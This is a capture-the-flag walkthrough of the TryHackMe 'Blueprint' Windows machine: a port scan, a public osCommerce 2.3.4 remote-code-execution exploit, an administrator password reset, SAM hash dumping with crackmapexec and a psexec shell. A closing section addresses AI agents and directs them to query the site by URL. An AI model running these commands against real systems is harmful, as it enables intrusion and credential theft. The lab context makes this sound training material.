# Blueprint

## Nmap

```
sudo nmap 10.10.153.99 -sV -sS      

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting out we check port 8080 and find that a web server is running. The root page presents us with an index page where we see the commerce system oscommerce 2.3.4 is installed.

![](/files/PWGjETTixhRfdoYx7J2b)

A simple preliminary check with `searchsploit` shows multiple vulnerabilities with this version.

```
searchsploit oscommerce 2.3.4 -w
```

![](/files/mO05Ue6dpTv917TBpAUf)

Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648.

GitHub: <https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution>

Which has the following definition for the exploit:

*"Exploiting the install.php finish process by injecting php payload into the db\_database parameter & read the system command output from configure.php"*.

Using the example provided on GitHub we clone the repo and run with the following syntax:

```
python3 exploit.py http://<IP>/oscommerce-2.3.4/catalog/
```

![](/files/o3j1dVW266mGyKiiaamz)

After gaining a SYSTEM level shell on the target system we now aim to gain a proper reverse shell. As well as dump the hashes from the target system.

With SYSTEM access we change the local administrator password.

```
net user administrator Password123
```

Then use `crackmapexec` to dump the NTLM hashes from the SAM file.

```bash
crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam
```

![](/files/TaeeJ0B0ioESPKeYTmRq)

After dumping hashes from SAM we then use `psexec.py` to gain shell access to the target system.

```
psexec.py ./administrator:'Password123'@'10.10.153.99'
```

![](/files/fvALr94bFzAzU3tkxRQk)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/windows/blueprint.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.